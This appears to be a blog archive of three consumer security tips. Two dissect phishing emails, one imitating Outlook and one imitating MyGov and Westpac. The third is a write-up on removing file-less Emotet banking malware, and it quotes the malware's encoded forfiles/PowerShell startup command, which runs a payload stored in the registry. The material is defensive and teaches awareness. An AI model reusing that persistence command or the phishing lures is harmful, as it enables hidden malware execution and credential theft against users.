Category Archives: Phishing

Phishing, security

Security Alert – Outlook Phishing Email

Phishing emails come in many variants. Often they are an attempt to phish user credentials, which can be used by the attacker or sold on the darkweb.

Below is an example of an email designed to phish Outlook or Office 365 credentials.

Outlook is an online email service provided by Microsoft. Office 365 is Microsoft’s Office subscription service.

If someone was able to steal your password to either of these services they would then have access to your email, and if you are using it, files stored in OneDrive.

In this case, the spammer isn’t targeting one group, but instead killing two birds with one stone by targeting Outlook.com and Office 365 Users. This gives them a higher number of potential victims.

If someone is able to access your email account, they will be able to access all your online accounts by resetting your passwords.

The spammer has used several techniques to try and get the recipient to lower their guard.

If you’ve noticed; the email says it is from Outlook Office365 and shows that it come from the email address: outlook @ office365.com.

Spammers can make an email appear to come from any email address. This is called spoofing. This gives the impression that the email is legitimate because it appears to come from a legitimate source.

The email arrived with the subject Security Alert. When you’re signing into a service on a new device, you will often receive a “security alert” email. This is a feature offered by many online services so that you are alerted if someone was to access your account.

The spammer is hoping that the subject of Security Alert is enough to tempt you to open the email.

The email goes on to say that there has been a new sign in from a Linux device. The spammer is mentioning an operating system with a low market share to again get you to lower your guard.

If the email mentioned a new sign in from Windows (which has a high market share), the recipient may just think it was themselves signing in to the service. But, by saying there was a new sign in from Linux, the spammer is hoping that the user is not a Linux user and will want to block this “attacker” from accessing their account.

The email has a button to click to “check activity”. This button is directed to a phishing website. The website looks legitimate and uses the Outlook.com logos and layout. If you were to enter your credentials into the website to “sign in”, these credentials would be sent to the spammer, who can now access the you account or resell the credentials on the darkweb.

Always take caution when an email is asking you act urgently. If you are unsure, you can sign into the service via the web browser (as apposed to clicking a link). Most services now have notifications within the service itself, and will alert you to security related items.

With Outlook, you can visit https://accounts.microsoft.com and click the Security link to view more details about the security of your account. From this menu you can see Sign-in Activity, Check Password Security (and turn on 2FA), and update your security information.

If you have fallen for a Outlook.com phishing email, Microsoft have some resources on the steps you can take.

To see learn about other scams and methods scammers are using, check out the ScamWatch website.

You can also check out other Tech Tips articles by Grenfell Internet Centre. Don’t forget to share this blog post with family and friends!

Phishing, Scams

New Partnership with Westpac – Scam Email

MyGov and Westpac customers should be wary of a MyGov phishing email doing the rounds claiming you can earn a 30% discount on your next “tax payment” and a $300 bonus deposited in your account.

The email has the subject of New partnership with Westpac. New Rewards.

The scam email contains the Australian Government logo and the MyGov logo to give itself some credibility. The scammers have also spoofed the sender email to make it appear as though it has come from MyGov.

The email then goes on to say that ATO has signed a strategic partnership with Westpac, and that if you add your Westpac account to MyGov, you will receive a welcome bonus of $300.

The offer of a bonus is a tactic used by scammers to get you to lower your guard and to take the bait.

Upon clicking the click you are directed to a phishing website used to harvest MyGov Credentials.

This would allow the scammer to access your MyGov records and everything attached to it. If you make the habit of reusing passwords the scammer could then use your password to log into your other accounts, such as your bank account, or email.

Phishing emails can be reported to allow the corporations being impersonated to take action by alerting customers to the scam, or by assisting authorities in taking down the scam.

ATO themed scams can be reported here: https://www.ato.gov.au/General/Online-services/Identity-security/Verify-or-report-a-scam/

Westpac themed scams can be reported here: https://www.westpac.com.au/security/how-to-report/

Google also allow you to report phishing pages which they can then block directly in Google Chrome. You can do that here: https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en

Always be wary of emails offering a reward by doing very little. Phishing emails can be very well put together and anyone can fall victim. If something sounds too good to be true, it most likely is.

Feel free to share this article with friends and family to help keep them safe and secure online. And don’t forget to check out our previous Tech Tips articles.

malware, Phishing, Windows

Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be ASIC Messaging Service. It advises the user that their business name is due for renewal . The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper.  This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the clients PC.

For those who are interested in the more technical details, I wont link directly to the pages, but the Virus Total page for the original link can be found here.  The link in which it redirects to is no longer available but the Virus Total page can be viewed here.  The second link has been marked by a member of the Virus Total community as ASIC phising/malware.

I was investigating the Malware infection for a client after the fact. At the time the client clicked the link (browser history verified link was clicked) a java script file appears to have been downloaded onto the machine. Virus TotalHybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed after this time a command prompt window would flashed up on the screen upon Windows start up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the clients bank contacted them to advice that their PC was infected with a Banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup, a command that utilizes a trusted Windows executable file, was set to run each bootup.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA”

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec iex (gp ‘HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}’).T”

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run each start up and load the malware from the registry into the memory. This avoids it writing to disk and helps to prevent detection.

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware screenshots are taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safe guard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other task you can do to protect yourself or your business.

Train against phishing – It is simple for most home users; don’t click links, and avoid attachments from people you don’t know. But for business users, it is a littler harder. Many staff members jobs involve clicking links and opening attachment. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the Operating System via Windows Updates (Windows Key + R, type control update, press enter, and click Check for updates). Software can be easily updated using Patch my PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (If your business has in house IT staff start here). Sometimes talking out loud will help you tell if something is genuine or not.

Read our other articles and share will your friends – I have covered many other tech tips topics. Read them and share them with your friends.